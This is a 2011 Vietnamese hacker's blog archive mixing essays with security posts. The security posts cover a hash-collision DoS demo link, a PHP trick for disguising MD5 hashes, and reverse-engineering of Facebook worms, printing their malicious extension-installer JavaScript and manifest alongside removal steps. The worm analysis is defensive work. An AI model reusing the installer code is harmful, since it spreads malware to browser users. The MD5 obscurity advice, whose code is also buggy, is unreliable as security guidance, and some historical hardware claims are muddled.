Friday, December 30, 2011

Hash collisions in POST Denial-of-service exploit demo

Mới đọc được cái này trên thehackernews.com

Đây là một lỗi mới liên quan tới tình trạng hash collisions trong xử lý hash tables của một số trình dịch ngôn ngữ web hiện nay (PHP,JSP,ASP...) khiến máy chủ bị hao tổn quá nhiều tài nguyên trong việc xử lý các collisions


In computer science, a hash table or hash map is a data structure that uses a hash function to map identifying values, known as keys (e.g., a person's name), to their associated values (e.g., their telephone number). Thus, a hash table implements an associative array. The hash function is used to transform the key into the index (the hash) of an array element (the slot orbucket) where the corresponding value is to be sought.
Ideally, the hash function should map each possible key to a unique slot index, but this ideal is rarely achievable in practice (unless the hash keys are fixed; i.e. new entries are never added to the table after it is created). Instead, most hash table designs assume that hash collisions—different keys that map to the same hash value—will occur and must be accommodated in some way.
-----------------------------

Cái đặc biệt ở đây là có một công cụ demo exploit lỗi này được viết chỉ bằng HTML và Javascript nhưng demo rất hữu hiệu việc làm treo đứng cái server Apache chạy kèm với trình dịch PHP của tôi như hình minh họa dưới đây


CPU load tăng vọt ngay tức thì lên 50% sau cú POST đầu tiên, tới cú POST thứ 2 thì CPU vọt lên đến 100% và cái server chạy Core2 duo của tôi treo cứng ngắc

Cái demo exploit này có tại đây: http://koto.github.com/blog-kotowicz-net-examples/hashcollision/kill.html
Bạn có thể view source để thấy nó thực hiện việc exploit như thế nào

Một cách che dấu chuỗi hash MD5 của mật khẩu trong PHP

Hôm nay tôi được biết một số lập trình viên ( nước ngoài ) dùng cách sau để bảo vệ một mã hash MD5 của họ

<?php
$password = "Hehe I'm xnohat";
$hashmd5 = md5($password);
$compressedhash   = gzdeflate($hashmd5, 9);
$base64encodedhash = base64_encode($compressedhash); // S05OMTY1NkxNszQ1SzFMSTMwSzZONDA2MTFPSU1NNjdWAAA=
//-------------------Kết thúc phần tạo mã hash giả dạng Base64 Encoded------------------
$uncompressedhash = gzinflate(base64_decode($compressed));
echo $uncompressedhash; // MD5 hash nguyên thủy ban đầu
?>

Cái hay ở đây là nó tạo ra tình trạng "obscurity" , khiến kẻ tấn công khi lấy được chuỗi hash của mật khẩu sẽ cứ cố tìm cách Base64_decode cái đoạn có vẻ trông như Base64 Encoded ( S05OMTY1NkxNszQ1SzFMSTMwSzZONDA2MTFPSU1NNjdWAAA= ) để chỉ nhận được "một file nhị phân" (binary) mà không sao tìm ra chuỗi md5 gốc. 

Điều này giúp đánh bại ý chí tìm md5 hash để rồi quăng vô một số md5 rainbow table cracker để tìm mật khẩu gốc của các script kiddes ( nhất là khi ở VN tình trạng tấn công SQLi , Local attack đầy nhan nhản )

Bạn thử decode cái đoạn Base64 Encoded trên bằng công cụ online này http://www.opinionatedgeek.com/dotnet/tools/base64decode/ xem sao :D

RFC1951 (http://www.faqs.org/rfcs/rfc1951.html) viết rất rõ về DEFLATE compression algorithm này

Wednesday, December 28, 2011

Một thoáng lịch sử của ngành CNTT Việt Nam



Dạo qua một chút lịch sử về ngành CNTT ở VN, ngày đó chúng ta có tất cả các cơ hội trời cho, cơ hội để trở thành một cường quốc về CNTT (chí ít là về mặt phần mềm), vậy mà đến giờ Viện CNTT rơi vào quên lãng, nền CNTT vẫn chỉ loay hoay với mấy công ty dot.com nhỏ xíu . Tiền nhân có buồn chăng ?

Đón nhận chiếc Minsk-22 đầu tiên ( Computer của Soviet Union sản xuất )
http://ictnews.vn/home/Kinh-doanh/8/Don-nhan-chiec-Minsk22/13215/index.ict
Lần đầu tổng điều tra dân số trên máy tính điện tử
http://ictnews.vn/home/Ho-so/31/Lan-dau-tong-dieu-tra-dan-so-tren-PC/13751/index.ict
Đội quân máy tính tiếp quản Sài Gòn
Phần 1:
http://ictnews.vn/home/Ho-so/31/Doi-quan-may-tinh-tiep-quan-Sai-Gon/13557/index.ict
Phần 2:
Những tên trộm tại đồi thông
Phần 1:
http://ictnews.vn/home/Ho-so/31/Nhung-ten-trom-tai-Doi-Thong/13789/index.ict
Phần 2:
http://www.ictnews.vn/home/Ho-so/31/Nhung-ten-trom-tai-Doi-Thong-II/13840/index.ict
TRƯỞNG THÀNH TỪ PHÒNG MÁY TÍNH (Nguyễn Văn Kỷ)
http://www.ioit.ac.vn/pages/index.asp?progid=10&NewsID=75

Tôi cũng ghi chút chút về cái máy Minsk-22 mà các nhà khoa học đầu tiên trong ngành CNTT của chúng ta tiếp xúc. Nó là loại máy tính lớn ( chỉ có thể gọi là Computer ) hay còn gọi là các Mainframe . Hệ máy này do Soviet Union thiết kế dựa trên một bản vẽ logic khá sơ sài của hệ máy PDP của hãng DEC Hoa Kỳ được các sĩ quan KGB đánh cắp về ( kĩ nghệ về CNTT của Hoa Kỳ vẫn đi xa hàng thập kỉ so với Soviet Union vào thời đó ). Máy có kích thước chiếm hết 1 gian phòng 100m2 , không dùng mạch tích hợp ( vì công nghệ mạch tích hợp - IC thời đó còn rất sơ khai ) , dùng bóng bán dẫn chớ không phải Transistor như các máy tính ngày nay vì tới năm 1957 mới có các thiết bị đơn giản ứng dụng Transistor thay cho các bóng bán dẫn cỡ lớn ( mà tiên phong là hãng điện tử lừng danh Sony ). Máy không có hệ điều hành, chạy đơn nhiệm ( quá tệ ! ), dùng ngôn ngữ lập trình là ... ngôn ngữ máy ( hoặc khá hơn là hợp ngữ ), cùng một vài ngôn ngữ cổ đại thời đó như FORTRAN, COLBOL ...


Cùng khoảng thời gian đó, miền nam Việt Nam, người Mỹ đã đưa vào VN từ những năm 1970 các máy mainframe của IBM sản xuất với các tính năng vượt trội khủng khiếp nhằm các mục đích tính toán lớn trong cuộc chiến tranh VN. Sau năm 1975 toàn bộ các máy mainframe này đều lọt vào tay chúng ta hiện nay, bao gồm cả máy mainframe khá tốt vào thời đó là IBM360/50 ( chệp nghe quen quen với cái tên PC IBM386 đúng không ).


Thế nhưng giờ chúng ta ra sao ?! ...

Friday, December 23, 2011

Cách gỡ bỏ ( diệt ) con FB Worm "Facebook Christmas Theme" mới (kèm thông tin RE)

Đây là biến thể mới nhất của con Facebook Worm ( hay nhiều người gọi là Facebook Virus ), cách gỡ ( diệt ) con worm này ra nằm ở cuối bài viết này, nếu bạn không phải người yêu thích kĩ thuật, chỉ muốn biết cách gỡ ( diệt ) con worm ra thì vui lòng bỏ qua đoạn phân tích dài ngoằng bên dưới mà đi thẳng đến phần cuối bài.


Link lây lan dạng:
http://j.mp/XmasTheme?hereenow 


Truy cập vào sẽ chuyển đến
-> http://biglol.in/


;--------------------- Ham kich hoat cai dat Plugin----------------------
<a onclick="instalar();" class="install nomargin"></a>
;--------------------------Noi dung ham cai dat plugin----------------------
function instalar(){
                if (is_chrome){
                    click_img();
                    window.open("http://biglol.in/fb.crx");
                } else if(is_firefox){
                    click_img();
                    var params = {
                        "Youtube Extension": {
                            URL: "http://biglol.in/firefox.xpi",
                            toString: function () { return this.URL; }
                        }
                    };
                    InstallTrigger.install(params);
                } else{
                    window.open("http://www.google.com/chrome/eula.html");
                }
            }
            if(!is_chrome && !is_firefox ){
                var id, servidor;
                id=getQuerystring("id",null);
                servidor="videozer";
                if(id!=null){
                    window.location="http://thelegendary6.com/video.php";

                }else{
                    window.location="http://thelegendary6.com/video.php";
}             
            }


;------------------------ Source bo phan lay lan---------------------
http://biglol.in/script/g.js -> http://biglol.in/script/w.js


;--------------------------- 2 Plugin virus moi------------------
Tên chung trong phần add-on sẽ là "Facebook Christmas Theme"


Chrome:
http://biglol.in/fb.crx
Firefox:
http://biglol.in/firefox.xpi

;--------------------------- Cách gỡ bỏ Virus FB biến thể Chrismas themes -----------------------
Cũng như phiên bản virus trước nhưng lần này 2 plugin cần gỡ bỏ đều có tên là "Facebook Christmas Theme"


Chrome: mở tab mới, vào phần Apps, kiếm cái plugin  "Facebook Christmas Theme" , nhấp phải chọn remove from Chrome . Xong


Chú ý: virus trong Chrome có icon trông như sau


Logo FB Worm trong Chrome

Firefox: vào Menu Tool -> add-on -> extensions -> chọn cái plugin 
"Facebook Christmas Theme"  rồi chọn Remove . Xong


Chú ý: virus trong Firefox có icon trông như sau

Logo FB Worm trong Firefox
-----------------------------
Kỷ lục mới, RE trong 10p, nhanh hơn lần trước, lần sau phấn đấu còn 5p :))

xnohat - HVAonline.net

Sunday, December 18, 2011

RE con Worm Facebook đang hoành hành hiện nay

Mình bị con Worm này làm phiền quá, bạn bè bị dính cứ vô spam đầy cái wall của mình. Thôi thì làm một cú RE nhanh con Worm này và chỉ bà con cách gỡ bỏ con worm này khỏi trình duyệt

Con worm này xuất phát từ một trang fake FB ở địa chỉ http://fbviralvideos.blogspot.com/

Tại trang này chả có gì cả ngoài việc nó làm giả y chang một cái trang FB của một em hót girl nào đó bên trời tây, kèm một cái link "Cài đặt plugin" để coi em ấy show hàng. Khi click vào cái nút "Install Plugin" đó nó sẽ kích hoạt một hàm tên

<a onclick="instalar();" class="install nomargin"></a>
Cái hàm này sẽ thực hiện thăm dò xem trình duyệt nạn nhân đang dùng là Firefox hay Chrome để đưa ra cái link cài Plugin giả mạo

   <script>
                var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
                var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
                function instalar(){
                    if (is_chrome){
                        window.open("http://yourvidsviral.com/youtube.crx");
                    } else if(is_firefox){
                        var params = {
                            "Youtube Extension": {
                                URL: "http://yourvidsviral.com/youtube.xpi",
                                toString: function () { return this.URL; }
                            }
                        };
                        InstallTrigger.install(params);
                    } else{
                         window.open("");
                    }
                }
            </script>   

Cái link cài plugin xạo xạo này chính là con worm. Cái hay ở đây là con worm này không làm bằng binary mà viết bằng javascript và được đóng gói thành plugin của Chrome ( dạng crx ) và plugin của Firefox ( dạng xpi ).

Sau khi cài plugin vào thì nó sẽ kích hoạt phần chính của con worm, đây là phần chịu trách nhiệm lây lan tiếp tới các người dùng FB khác. Script này được load về từ link http://yourvidsviral.com/script.js

Kèm theo đó, trong con worm này còn được tích hợp cơ chế cập nhật thông qua tính năng cập nhật plugin tự động của Firefox hay Chrome


{
   "content_scripts": [ {
      "all_frames": true,
     "matches": [ "http://*/*"],
 "js": [ "go.js" ]
} ],

   "description": "Plays Youtube Videos Online, Quickly \u0026 Efficiently",
   "icons": {
      "128": "icon128.png",
      "16": "icon16.png",
      "48": "icon48.png"
   },

   "name": "YouTube Extension",
   "permissions": [ "*://*/*" ],
   "update_url": "http://allinfree.net/chrome.xml",   "version": "1.0.3"
}

Đã RE xong, bạn có thể tải về toàn bộ gói dữ liệu của con worm đã được RE tại đây để nghiên cứu

http://www.mediafire.com/?6vxm6a77t4x66t1

-----------------------------


Cách gỡ bỏ con Worm

Chrome: mở tab mới, vào phần Apps, kiếm cái plugin Youtube, nhấp phải chọn remove from Chrome . Xong

Firefox: vào Menu Tool -> add-on -> extensions -> chọn cái plugin Youtube rồi chọn Remove . Xong

------------------------------

RE toàn bộ con worm trong 15 phút, phá kỷ lục trước giờ của mền :D

Tuesday, November 29, 2011

Chúa có chơi súc sắc không?





Xin giới thiệu cùng độc giả bản dịch bài viết nổi tiếng của Stephen Hawking "Does Dod play dice" (Chúa có chơi súc sắc không). Bài viết này được Hawking thực hiện năm 1999, lưu ý rằng từ đó đến nay chúng ta đã biết thêm nhiều điều về vũ trụ.

Monday, November 21, 2011

Báo cáo xu thế phát triển công nghệ trong năm tới của IBM - phiên bản công bố năm 2011



IBM thực hiện một khảo sát lớn với 4000 IT experts từ nhiều quốc gia, khu vực và sectors khác nhau. Nhằm phân tích và nhận định xu hướng phát triển công nghệ vào năm sau.

Báo cáo bao gồm nhiều mảng: Business Analytics, Mobile Computing, Cloud Computing, Social Business

Tôi thấy đặc sắc nhất là việc rất nhiều ( hơn 70% ) chuyên gia cho rằng kĩ nghệ và thuật toán trong cỗ máy IBM Watson được đánh giá rất cao về năng lực phân tích dữ liệu khối lượng lớn, cũng như cách hồi đáp kết quả tuyệt vời của nó. Thay vì các bảng biểu, sơ đồ, điểu đổ, bảng đo tần suất ... thì IBM Watson chỉ đơn giản trả về một câu trả lời với chỉ vài từ, nhưng súc tích và cô đọng. Kiểu như tôi chỉ cần hỏi: "Có nên launch sản phẩm A vào lúc này hay không" , IBM Watson chỉ việc chạy xuyên qua hàng Terabyte dữ liệu của doanh nghiệp, dữ liệu public và private thậm chí là dữ liệu toàn cầu, rồi trả lời ngắn gọn: "Giờ chưa phải lúc, năm sau thì ok" . That's Great !!!

Đây là link down bản báo cáo từ IBM:

http://goo.gl/fgtMk


Wednesday, November 9, 2011

Sáu mươi sáu câu Phật học ứng với con người thuộc bất kỳ tôn giáo, chính trị, văn hóa, dân tộc nào.

Sáu mươi sáu câu Phật học ứng với con người thuộc bất kỳ tôn giáo, chính trị, văn hóa, dân tộc nào.

1. Sở dĩ người ta đau khổ chính vì mãi đeo đuổi những thứ sai lầm.
2. Nếu anh không muốn rước phiền não vào mình, thì người khác cũng không cách nào gây phiền não cho anh. Vì chính tâm anh không buông xuống nỗi.
3. Anh hãy luôn cảm ơn những ai đem đến nghịch cảnh cho mình.
4. Anh phải luôn mở lòng khoan dung lượng thứ cho chúng sanh, cho dù họ xấu bao nhiêu, thậm chí họ đã làm tổn thương anh, anh phải buông bỏ, mới có được niềm vui đích thực.
5. Khi anh vui, phải nghĩ rằng niềm vui này không phải là vĩnh hằng. Khi anh đau khổ, anh hãy nghĩ rằng nỗi đau này cũng không trường tồn.
6. Sự chấp trước của ngày hôm nay sẽ là niềm hối hận cho ngày mai.
7. Anh có thể có tình yêu nhưng đừng nên dính mắc, vì chia ly là lẽ tất nhiên.
8. Đừng lãng phí sinh mạng của mình trong những chốn mà nhất định anh sẽ ân hận.
9. Khi nào anh thật sự buông xuống thì lúc ấy anh sẽ hết phiền não.
10. Mỗi một vết thương đều là một sự trưởng thành.
11. Người cuồng vọng còn cứu được, người tự ti thì vô phương, chỉ khi nhận thức được mình, hàng phục chính mình, sửa đổi mình, mới có thể thay đổi người khác.
12. Anh đừng có thái độ bất mãn người ta hoài, anh phải quay về kiểm điểm chính mình mới đúng. Bất mãn người khác là chuốc khổ cho chính anh.
13. Một người nếu tự đáy lòng không thể tha thứ cho kẻ khác, thì lòng họ sẽ không bao giờ được thanh thản.
14. Người mà trong tâm chứa đầy cách nghĩ và cách nhìn của mình thì sẽ không bao giờ nghe được tiếng lòng người khác.
15. Hủy diệt người chỉ cần một câu, xây dựng người lại mất ngàn lời, xin anh “ đa khẩu hạ lưu tình”.
16. Vốn dĩ không cần quay đầu lại xem người nguyền rủa anh là ai? Giả sử anh bị chó điên cắn anh một phát, chẳng lẽ anh cũng phải chạy đến cắn lại một phát?
17. Đừng bao giờ lãng phí một giây phút nào để nghĩ nhớ đến người anh không hề yêu thích.
18. Mong anh đem lòng từ bi và thái độ ôn hòa để bày tỏ những nỗi oan ức và bất mãn của mình, có như vậy người khác mới khả dĩ tiếp nhận.
19. Cùng là một chiếc bình như vậy, tại sao anh lại chứa độc dược? Cùng một mảnh tâm tại sao anh phải chứa đầy những não phiền như vậy?
20. Những thứ không đạt được, chúng ta sẽ luôn cho rằng nó đẹp đẽ, chính vì anh hiểu nó quá ít, anh không có thời gian ở chung với nó. Nhưng rồi một ngày nào đó khi anh hiểu sâu sắc, anh sẽ phát hiện nó vốn không đẹp như trong tưởng tượng của anh.
21. Sống một ngày là có diễm phúc của một ngày, nên phải trân quý. Khi tôi khóc, tôi không có dép để mang thì tôi lại phát hiện có người không có chân.
22. Tốn thêm một chút tâm lực để chú ý người khác chi bằng bớt một chút tâm lực phản tỉnh chính mình, anh hiểu chứ?
23. Hận thù người khác là một mất mát lớn nhất đối với mình.
24. Mỗi người ai cũng có mạng sống, nhưng không phải ai cũng hiểu được điều đó, thậm chí trân quý mạng sống của mình hơn. Người không hiểu được mạng sống thì mạng sống đối với họ mà nói chính là một sự trừng phạt.
25. Tình chấp là nguyên nhân của khổ não, buông tình chấp anh mới được tự tại.
26. Đừng khẳng định về cách nghĩ của mình quá, như vậy sẽ đỡ phải hối hận hơn.
27. Khi anh thành thật với chính mình, thế giới sẽ không ai lừa dối anh.
28. Người che đậy khuyết điểm của mình bằng thủ đoạn tổn thương người khác là kẻ đê tiện.
29. Người âm thầm quan tâm chúc phúc người khác, đó là một sự bố thí vô hình.
30. Đừng gắng sức suy đoán cách nghĩ của người khác, nếu anh không phán đoán chính xác bằng trí huệ và kinh nghiệm thì mắc phải nhầm lẫn là lẽ thường tình.
31. Muốn hiểu một người, chỉ cần xem mục đích đến và xuất phát điểm của họ có giống nhau không, thì có thể biết được họ có thật lòng không.
32. Chân lý của nhân sinh chỉ là giấu trong cái bình thường đơn điệu.
33. Người không tắm sửa thì càng xức nước hoa càng thấy thối. Danh tiếng và tôn quý đến từ sự chân tài thực học. Có đức tự nhiên thơm.
34. Thời gian sẽ trôi qua, để thời gian xóa sạch phiền não của anh đi.
35. Anh cứ xem những chuyện đơn thuần thành nghiêm trọng, như thế anh sẽ rất đau khổ.
36. Người luôn e dè với thiện ý của người khác thì hết thuốc cứu chữa.
37. Nói một lời dối dang thì phải bịa thêm mười câu không thật nữa để đắp vào, cần gì khổ như vậy?
38. Sống một ngày vô ích, không làm được chuyện gì, thì chẳng khác gì kẻ phạm tội ăn trộm.
39. Quảng kết chúng duyên, chính là không làm tổn thương bất cứ người nào.
40. Im lặng là một câu trả lời hay nhất của sự phỉ báng.
41. Cung kính đối với người là sự trang nghiêm cho chính mình.
42. Có lòng thương yêu vô tư thì sẽ có tất cả.
43. Đến là ngẫu nhiên, đi là tất nhiên. Cho nên anh cần phải “ tùy duyên mà hằng bất biến, bất biến mà hằng tùy duyên”.
44. Từ bi là vũ khí tốt nhất của chính anh.
45. Chỉ cần đối diện với hiện thực, anh mới vượt qua hiện thực.
46. Lương tâm là tòa án công bằng nhất của mỗi người, anh dối người khác được nhưng không bao giờ dối nỗi lương tâm mình.
47. Người không biết yêu mình thì không thể yêu được người khác.
48. Có lúc chúng ta muốn thầm hỏi mình, chúng ta đang đeo đuổi cái gì? Chúng ta sống vì cái gì?
49. Đừng vì một chút tranh chấp mà xa lìa tình bạn chí thân của anh, cũng đừng vì một chút oán giận mà quên đi thâm ân của người khác.
50. Cảm ơn thượng đế với những gì tôi đã có, cảm ơn thượng đế những gì tôi không có.
51. Nếu có thể đứng ở góc độ của người khác để nghĩ cho họ thì đó mới là từ bi.
52. Nói năng đừng có tánh châm chọc, đừng gây thương tổn, đừng khoe tài cáng của mình, đừng phô điều xấu của người, tự nhiên sẽ hóa địch thành bạn.
53. Thành thật đối diện với mâu thuẩn và khuyết điểm trong tâm mình, đừng lừa dối chính mình.
54. Nhân quả không nợ chúng ta thứ gì, cho nên xin đừng oán trách nó.
55. Đa số người cả đời chỉ làm được ba việc: Dối mình, dối người, và bị người dối.
56. Tâm là tên lừa đảo lớn nhất, người khác có thể dối anh nhất thời, nhưng nó lại gạt anh suốt đời.
57. Chỉ cần tự giác tâm an, thì đông tây nam bắc đều tốt. Nếu còn một người chưa độ thì đừng nên thoát một mình.
58. Khi trong tay anh nắm chặt một vật gì mà không buông xuống, thì anh chỉ có mỗi thứ này, nếu anh chịu buông xuống, thì anh mới có cơ hội chọn lựa những thứ khác. Nếu một người luôn khư khư với quan niệm của mình, không chịu buông xuống thì trí huệ chỉ có thể đạt đến ở một mức độ nào đó mà thôi.
59. Nếu anh có thể sống qua những ngày bình an, thì đó chính là một phúc phần rồi. Biết bao nhiêu người hôm nay đã không thấy được vầng thái dương của ngày mai, biết bao nhiêu người hôm nay đã trở thành tàn phế, biết bao nhiêu người hôm nay đã đánh mất tự do, biết bao nhiêu người hôm nay đã trở thành nước mất nhà tan.
60. Anh có nhân sinh quan của anh, tôi có nhân sinh quan của tôi, tôi không dính dáng gì tới anh. Chỉ cần tôi có thể, tôi sẽ cảm hóa được anh. Nếu không thể thì tôi đành cam chịu.
61. Anh hi vọng nắm được sự vĩnh hằng thì anh cần phải khống chế hiện tại.
62. Ác khẩu, mãi mãi đừng để nó thốt ra từ miệng chúng ta, cho dù người ta có xấu bao nhiêu, có ác bao nhiêu. Anh càng nguyền rủa họ, tâm anh càng bị nhiễm ô, anh hãy nghĩ, họ chính là thiện tri thức của anh.
63. Người khác có thể làm trái nhân quả, người khác có thể tổn hại chúng ta, đánh chúng ta, phỉ báng chúng ta. Nhưng chúng ta đừng vì thế mà oán hận họ, vì sao? Vì chúng ta nhất định phải giữ một bản tánh hoàn chỉnh và một tâm hồn thanh tịnh.
64. Nếu một người chưa từng cảm nhận sự đau khổ khó khăn thì rất khó cảm thông cho người khác. Anh muốn học tinh thần cứu khổ cứu nạn, thì trước hết phải chịu đựng được khổ nạn.
65. Thế giới vốn không thuộc về anh, vì thế anh không cần vứt bỏ, cái cần vứt bỏ chính là những tánh cố chấp. Vạn vật đều cung ứng cho ta, nhưng không thuộc về ta.
66. Bởi chúng ta không thể thay đổi được thế giới xung quanh, nên chúng ta đành phải sửa đổi chính mình, đối diện với tất cả bằng lòng từ bi và tâm trí huệ.



(Sưu tầm - Không thể tìm nguồn)

Lần theo mê-lộ có đường hầm của Hệ Thống Tiền Tệ Mỹ



Lần theo mê-lộ có đường hầm của Hệ Thống Tiền Tệ Mỹ

B.S. Nguyễn Lưu Viên
------------------------------------------------------------
Lời nói đầu
Cả năm qua báo chí Mỹ thường hay nói tới việc mất giá của đồng dollar, tới việc mắc nợ của chánh phủ Mỹ, rồi hay nhắc tới Federal Reserve, và tới tên của Ông Greenspan. Tôi không có học ÉcoPo của Pháp, không có học MBA của Mỹ nên mù tịt. Nhưng vì tò mò muốn hiểu biết, nên tôi đã cố gắng tìm tòi, học hỏi đó đây. Thì mới thấy rằng vấn đề tiền tệ của Mỹ là cả một mê-lộ có đường hầm, [un vrai labyrinthe avec des souterrains] một con đường máng dện chằng chịt mà nếu đi không có bản chỉ dẫn thì sẽ dể bị lạc.

Rồi tôi nghĩ rằng trong số độc giả của Y Tế Nguyệt San chắc cũng có một ít bạn đọc mù tịt như tôi, nhưng không có thì giờ để nghiên cứu đó đây như tôi, nên tôi viết bài này tóm lược và giản-dị -hóa tối đa một vấn đề vô cùng phức tạp đã kéo dài theo lịch sử của Hoa-kỳ, để giúp phần nào các bạn ấy hiểu sơ sơ vấn đề về đồng dollar là một thực thể mà mình phải đ6í phó hằng ngày.  Tôi sẽ dùng phương pháp hõi và đáp [H & Đ] để dẫn đường quý bạn đi trên mê lộ và trong đường hầm ấy.

Tôi xin lưu ý quý bạn: Vì trong bài có vài ba cụm-từ được nhắc đi nhắc lại nhiều lần nên tôi sẽ viết tắt các cụm từ ấy như sau: FED là Federal Reserve, CPLB là Chánh Phủ Liên Bang, HCQHK là Hiệp Chũng Quốc Hoa-Kỳ USA  và T.T. là Tổng Thống.     

Saturday, November 5, 2011

New7Wonders - cả nước Việt bị lừa , hay trò lố của Bộ Văn Hóa - Thể Thao và Du Lịch

Từ năm 2007 tôi đã có vài bài viết trên mạng TTVN về vấn đề thực hư cái ích lợi từ việc đầu tư hàng ngàn tỷ đồng vận động bầu chọn cho vịnh Hạ Long thông qua các phân tích kỹ thuật về site traffic từ dịch vụ đánh giá tín nhiệm Alexa và Google Adplanner . Nay tôi thực hiện lại phép phân tích trên để làm bằng chứng cho cái vố lừa lớn nhất của các bạn tây dương đối với chính phủ của nước Việt Nam kể từ khi lập quốc năm 1945 tới nay ( cụ Hồ mà còn sống thì chẳng biết sẽ làm gì các bác lãnh đạo đầu óc thần kinh hiện nay, chắc chỉ có đến nước cởi dép mà phang cho thông não )

Sunday, October 16, 2011

Đang lên kế hoạch cho một cuộc thi nho nhỏ về tấn công môi trường web

Tình hình là đang có một kế hoạch nho nhỏ cho một cuộc thi cũng nho nhỏ trên HVA về tấn công trên môi trường web, cần có người hợp tác :D

Who is volunteer ?

Wednesday, September 21, 2011

Có khi nào trên đường đời tấp nập ... hay khoa học về mối quan hệ

Bài này post trên một blog vài năm trước, nay nhân dịp thằng FB nó update cái giao diện mắc dịch mới nên mang ra post lại cho thời sự )
( Bữa nay rảnh do mí con siêu vi – sốt siêu vi – khiến mình phải nằm nhà không thể đi đâu được và không thể làm gì được, đành nằm và ôm con netbook iu thương mà tâm sự cho vãn sự đời vậy )


"Nửa kia", em nơi đâu ?


Có một bài thơ hay được nhiều người trích dẫn nhưng không rõ của ai

Có khi nào trên đường đời tấp nập
Ta vô tình đã đi lướt qua nhau
Bước lơ đãng chẳng ngờ đang để mất
Một tâm hồn ta đợi đã từ lâu

hôm nay dạo internet may mắn tìm ra được tên tuổi của tác giả, đó là nhà thơ Bùi Minh Quốc. Bài thơ này sáng tác trong thời kỳ chiến tranh khốc liệt, cái thời mà người ta có thể mất nhau chỉ sau một cái chớp mắt.

Đọc bài thơ này, tự dưng lại thầm cười vì cái chuyện “trái đất tròn”. Ừ phải đấy, trái đất rất “tròn”, con người đi một vòng lại gặp nhau.

Cứ ru rú ở nhà thì có lẽ chẳng bao giờ mình biết được trái đất nó tròn :)) , ví dụ vài cái thôi là thấy nó tròn “ác” thế nào.

Sunday, September 11, 2011

How to crack MD5 password :D

Danh sách này tôi dùng vài năm nay rồi, nay post lại, số hash có thể bị crack ngày nay có khi lên đến vài nghìn tỷ rồi cũng nên
 
Biggest MD5 crack databases

-----------------------------------------------------------------
MOST BIGGEST SITE OF MD5 DECRYPING
-----------------------------------------------------------------

Monday, August 22, 2011

Món quà nhỏ gửi tặng những người bạn đến từ ittravelersgo.com và những người bạn của tôi

Cám ơn bạn đã dành thời gian tham gia cuộc dạo chơi nhỏ của xnohat, mình rất hạnh phúc khi được kết bạn với bạn. dưới đây là món quà nhỏ bé gửi tặng bạn như là để làm quen ^.^

http://www.mediafire.com/?ljmijgizkwv

Nhớ vote cho mình nhé ^.^

http://www.ittravelersgo.com/index.php?option=com_contestgallery&view=detail&id=2464&Itemid=24&lang=vi

Sunday, July 10, 2011

Chúng ta sẽ là nô lệ của Google ?

2 Tuần nay bà con đang phát điên lên vì cái Google+ nên tới viết cái entry này coi như cảnh báo

Tôi viết bài này dưới cái nhìn của một người chuyên làm về các hệ thống thông tin, hệ thống phân tích cơ sở dữ liệu và một người có chút hiểu biết về an toàn thông tin.

*********
Dấu vết số
Bạn có tin rằng tôi chỉ cần biết online nick của bạn hay email của bạn là tôi có thể nắm được 1 phần thông tin của bạn không ?

Dễ lắm, bạn lấy cái nick của bạn, hay cái email bạn thường dùng nhất, quăng vào Google Search, click 1 cái, bạn sẽ thấy Google liệt kê một danh sách dài các trang web mà bạn đã tham gia (1) . Đem nick của bạn bỏ vào Google Blog Search tôi sẽ có các bài blog hay comment bạn có viết (2) . Đem nick của bạn bỏ vào Google Image tôi sẽ có một số ảnh liên quan tới bạn, gặp may thì tôi có thể có được link vào một albums trực tuyến nào đó của bạn cách đây khoảng 4, 5 năm gì đó (3)

Nhanh chưa, chỉ vài phút tôi có thể tạo một x-files ghi chép về cá nhân bạn, mối quan tâm của bạn, sở thích của bạn, hình ảnh của bạn, mối quan hệ của bạn, thậm chí những nơi bạn đã từng đi qua, chỗ nào bạn từng làm, nghề nghiệp... rất nhiều thứ, phụ thuộc vào sự chăm chỉ online của bạn

Ngày nay, bất kỳ những người trẻ nào sinh sau năm 1980 ( thế hệ 8x,9x,10x,n+10x ...) đều sử dụng internet như một phần rất quan trọng của cuộc sống ( tôi không thích viện dẫn các con số vì chúng rất dễ kiếm hãy thử ...google đi nhé :D ), do bạn dùng internet quá nhiều, nên bạn cũng vương vãi "dấu vết số" của bạn đầy rẫy trên internet. Và Google , với thuật toán thống kê dữ liệu thông minh và hiệu quả nhất trên thế giới hiện nay đang đóng vai trò thu thập dữ liệu về bạn vào chung một mối

Friday, July 1, 2011

Làm sao để tri thức thực sự là của mình ?

Dạo gần đây đọc nhiều sách hay, đâm ra đầu óc bay bổng quá. Ngồi tĩnh tâm chút nghĩ về cách mình đã học đúng chưa ?

Thoạt nhiên khi nghe câu hỏi này có thể bạn sẽ tức cười, vì ở tầm tuổi tôi hay bạn thì chuyện học có lẽ đã diễn ra qua nhiều năm rồi, và dĩ nhiên tôi cũng không nói tới chuyện "Học, học nữa, học mãi". Mà tôi muốn nói tới chuyện, ta giữ được bao nhiêu mảnh tri thức sau khi tọng vào đầu vô số "dữ liệu".

**************

Sự thật là hàng ngày, não bộ chúng ta ghi nhận hàng triệu dữ liệu mới, bao gồm hình ảnh, âm thanh, mùi vị, dữ liệu cảm biến ( xúc giác ), dữ liệu tri thức .... có thể lên tới hàng ngàn Gigabyte dữ liệu một ngày, tương đương một trận DoS có cường độ lưu lượng vài trăm Gigabit/s. Và bạn cũng sẽ thấy rằng, ta chỉ nhớ được rất ít, thậm chí tí xíu, trong hàng ngàn GB dữ liệu nói trên, do đó ta sẽ dễ dàng nhận ra là não bộ của chúng ta có một cơ chế tương tự Firewall, hay thậm chí là IPS có tính năng cản, phân tích, lọc, và định tuyến khối dữ liệu khổng tượng đang hàng ngày dội vào não bộ của ta - một datacenter khổng lồ

Vậy có cơ hội nào cho những dữ liệu giá trị, tức là những tri thức, kinh nghiệm nhỏ bé nhưng có giá trị tái sử dụng trong tương lại, như những con thuyền bé nhỏ, chòng chành, chen chân trong cơn lũ dữ liệu đang ào ạt chảy vào não của chúng ta ? Hay nó nhanh chóng bị nghẹt lại ở bên ngoài não do não bị bão hòa ( bão hòa đường truyền :D ), hoặc ta tự quên lãng, tự xóa kiến thức đó đi khi ta cảm thấy nó vô ích hay ít giá trị ( bị Firewall, IDS, Antivirus lọc bỏ )

Monday, June 20, 2011

Link download sớm Firefox 5.0 Final release

Quen thói thích chơi đồ hot nên lùng down bản Firefox 5.0, hiện chưa có trên trang chủ của Firefox, phải lục trong FTP server của mozilla

Link down trực tiếp từ Mozilla, nên down tại đây, chớ down bậy bạ kẻo bị tàu khựa nó cài bot

